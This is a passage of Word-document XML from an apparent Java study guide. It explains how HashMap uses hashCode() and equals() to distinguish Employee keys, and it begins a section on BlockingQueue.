    <w:p w14:paraId="27986B1F"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ere’s how </w:t>
      </w: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differentiates between multiple Employee objects (or any objects in general):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D5250C4" w14:textId="77777777" w:rsidR="00D32F5E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D32F5E" w:rsidP="00254D4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hashCode() Method:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F13422" w14:textId="77777777" w:rsidR="00D32F5E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D32F5E" w:rsidP="00254D48">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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insert an object into a HashMap, the hashCode() method is called to compute a hash value (an integer) for the object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356A00C0" w14:textId="77777777" w:rsidR="00D32F5E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D32F5E" w:rsidP="00254D48">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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hashCode() value helps determine the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>bucket</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slot</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the internal array where the object will be stored.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EAB9E17" w14:textId="77777777" w:rsidR="00D32F5E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D32F5E" w:rsidP="00254D48">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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bjects with different hashCode() values</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> will be placed in different buckets. However, two objects with the same hashCode() value will be placed in the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>same bucket</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58DCB81D" w14:textId="77777777" w:rsidR="00D32F5E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D32F5E" w:rsidP="00254D4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equals() Method:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26900F9F" w14:textId="77777777" w:rsidR="00D32F5E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D32F5E" w:rsidP="00254D48">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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fter computing the hash code and placing the object in the corresponding bucket, </w:t>
      </w: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needs to ensure that no two objects with the same key exist.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB40D7E" w14:textId="77777777" w:rsidR="00D32F5E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D32F5E" w:rsidP="00254D48">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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a collision occurs (i.e., two objects have the same hashCode() value), the equals() method is called to check whether the objects are truly equal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39768699" w14:textId="77777777" w:rsidR="00D32F5E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D32F5E" w:rsidP="00254D48">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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equals() method compares the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>actual content</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state</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the objects. If the equals() method returns true, it means the two objects are considered identical (even if they are distinct objects in memory).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13165DBF" w14:textId="77777777" w:rsidR="00D32F5E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D32F5E" w:rsidP="00254D48">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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equals() method returns false, it means the objects are different, and they can be stored in the same bucket without causing any issues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C172AC6" w14:textId="77777777" w:rsidR="00D32F5E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D32F5E" w:rsidP="00254D4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Differentiating Employee Objects in a HashMap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD0C538"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et’s say you have an Employee class with the name field:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072AE6A4"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HashMap;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13DEC745"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Map;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="648F638D" w14:textId="77777777" w:rsidR="00D32F5E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D32F5E" w:rsidP="00254D48">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BEB0EFB"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Employee {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33AAAF91"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ring name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="361E153C"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int age;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B21642E" w14:textId="77777777" w:rsidR="00D32F5E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D32F5E" w:rsidP="00254D48">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B0D1A32"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Employee(String name, int age) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B2AFB5"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name = name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320B676E"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age = age;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8BB508"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CACFE72" w14:textId="77777777" w:rsidR="00D32F5E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D32F5E" w:rsidP="00254D48">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73AA5612"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Override hashCode and equals to differentiate employees based on name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B4D7A3"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7CC18604"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int hashCode() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="273F46AF"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name.hashCode();  // Generate hash based on name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41876B89"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033536F2" w14:textId="77777777" w:rsidR="00D32F5E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D32F5E" w:rsidP="00254D48">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B89A307"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5A401777"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boolean equals(Object obj) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D10B7E"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this == obj) return true;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B2C3C1"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obj == null || getClass() != obj.getClass()) return false;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0C9AEE"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mployee employee = (Employee) obj;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A071CF"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name.equals(employee.name);  // Compare employees based on name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="763AC167"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71A76E4" w14:textId="77777777" w:rsidR="00D32F5E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D32F5E" w:rsidP="00254D48">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D4FE703"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5D5E444A"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ring toString() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="046EC1CC"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Employee{name='" + name + "', age=" + age + '}';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="280D6CB4"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60FF4B5"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D2B89E3" w14:textId="77777777" w:rsidR="00D32F5E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D32F5E" w:rsidP="00254D48">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A55A3E8"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627DB7F9"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0C07AA3F"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lt;Employee, String&gt; employeeMap = new HashMap&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D1ADDC0" w14:textId="77777777" w:rsidR="00D32F5E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D32F5E" w:rsidP="00254D48">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AB9BE55"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dding employees to the HashMap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C78378"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mployeeMap.put(new Employee("Alice", 30), "Engineer");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B0B5C1A"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mployeeMap.put(new Employee("Bob", 25), "Developer");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD90C30"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mployeeMap.put(new Employee("Alice", 30), "Senior Engineer"); // Duplicate name with same age</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB576DD" w14:textId="77777777" w:rsidR="00D32F5E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D32F5E" w:rsidP="00254D48">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E9DC5A3"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nting the values</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B3F7BF"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or (Map.Entry&lt;Employee, String&gt; entry : employeeMap.entrySet()) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44344C0E"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entry.getKey() + " =&gt; " + entry.getValue());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25567D9E"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21DE9A6"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0993136" w14:textId="77777777" w:rsidR="00D32F5E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D32F5E" w:rsidP="00254D4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001CF65" w14:textId="77777777" w:rsidR="00D32F5E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D32F5E" w:rsidP="00254D4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Points:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="007E19F5" w14:textId="77777777" w:rsidR="00D32F5E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D32F5E" w:rsidP="00254D48">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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Code()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The hashCode() method generates a hash value based on the employee's name (name.hashCode() in this case).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B66B54" w14:textId="77777777" w:rsidR="00D32F5E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D32F5E" w:rsidP="00254D48">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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quals()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The equals() method compares the names of two Employee objects to check if they are the same. So, two Employee objects with the same name are considered equal even if their memory locations are different.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71402625" w14:textId="77777777" w:rsidR="00D32F5E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D32F5E" w:rsidP="00254D48">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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ertion in HashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45043A5C" w14:textId="77777777" w:rsidR="00D32F5E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D32F5E" w:rsidP="00254D48">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9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insert a new Employee with the name "Alice" and age 30, the hashCode() and equals() methods will ensure that the second Employee with the same name will replace the first one because the key is the same.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E3FAFB7" w14:textId="77777777" w:rsidR="00D32F5E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D32F5E" w:rsidP="00254D4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ow HashMap stores and checks keys:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C44E694" w14:textId="77777777" w:rsidR="00D32F5E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D32F5E" w:rsidP="00254D48">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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add an Employee object, HashMap calculates the hash code of the key using hashCode().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4EB991" w14:textId="77777777" w:rsidR="00D32F5E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D32F5E" w:rsidP="00254D48">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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then places the object in the corresponding bucket in the internal array.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3931EEFB" w14:textId="77777777" w:rsidR="00D32F5E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D32F5E" w:rsidP="00254D48">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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another Employee with the same hashCode() value is added (a collision), HashMap will use the equals() method to check if the objects are the same. If they are, it updates the value associated with the key; if not, it stores the new object in the same bucket (using a linked list or tree structure if there are multiple objects in the same bucket).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA9DE09" w14:textId="77777777" w:rsidR="00D32F5E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D32F5E" w:rsidP="00254D4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 Summary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB7EAB7" w14:textId="77777777" w:rsidR="00D32F5E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D32F5E" w:rsidP="00254D48">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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Map</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> uses </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>hashCode()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to determine the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>bucket</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equals()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to verify whether two objects with the same hash code are actually the same or not.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B45A75" w14:textId="77777777" w:rsidR="00D32F5E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D32F5E" w:rsidP="00254D48">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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Code()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ensures efficient distribution of objects across the internal array, while </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>equals()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> checks the actual equality of two objects in case of a hash collision.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E2E24C" w14:textId="100A1828" w:rsidR="00324AE3" w:rsidRPr="00CE4B95"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B46A3E2">
          <v:rect id="_x0000_i1589" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F2CAD7" w14:textId="77777777" w:rsidR="003054BB" w:rsidRPr="00CE4B95" w:rsidRDefault="003054BB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="196" w:name="_Toc196307676"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>What is a Blocking Queue?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="196"/>
    </w:p>
    <w:p w14:paraId="00854870" w14:textId="1B207BB5" w:rsidR="003578D9" w:rsidRPr="00CE4B95" w:rsidRDefault="003578D9" w:rsidP="00494518">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BlockingQueue</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a type of </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>queue</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that supports operations that block when the queue is either full or empty. It is part of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>java.util.concurrent</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> package and is typically used in </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>multi-threaded</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> applications, especially in producer-consumer scenarios.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1438AE48" w14:textId="77777777" w:rsidR="003578D9" w:rsidRPr="00CE4B95" w:rsidRDefault="003578D9" w:rsidP="0049451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Features of a BlockingQueue:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D82BF78" w14:textId="77777777" w:rsidR="003578D9" w:rsidRPr="00CE4B95" w:rsidRDefault="003578D9" w:rsidP="00494518">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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locking on Insertion</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF85697" w14:textId="77777777" w:rsidR="003578D9" w:rsidRPr="00CE4B95" w:rsidRDefault="003578D9" w:rsidP="00494518">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9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the queue is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>full</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, a thread attempting to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>insert</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> an element will be blocked until there is space available.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="011EC7E9" w14:textId="77777777" w:rsidR="003578D9" w:rsidRPr="00CE4B95" w:rsidRDefault="003578D9" w:rsidP="00494518">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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locking on Removal</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E7DC3C" w14:textId="77777777" w:rsidR="003578D9" w:rsidRPr="00CE4B95" w:rsidRDefault="003578D9" w:rsidP="00494518">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9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the queue is </w:t>
      </w:r>
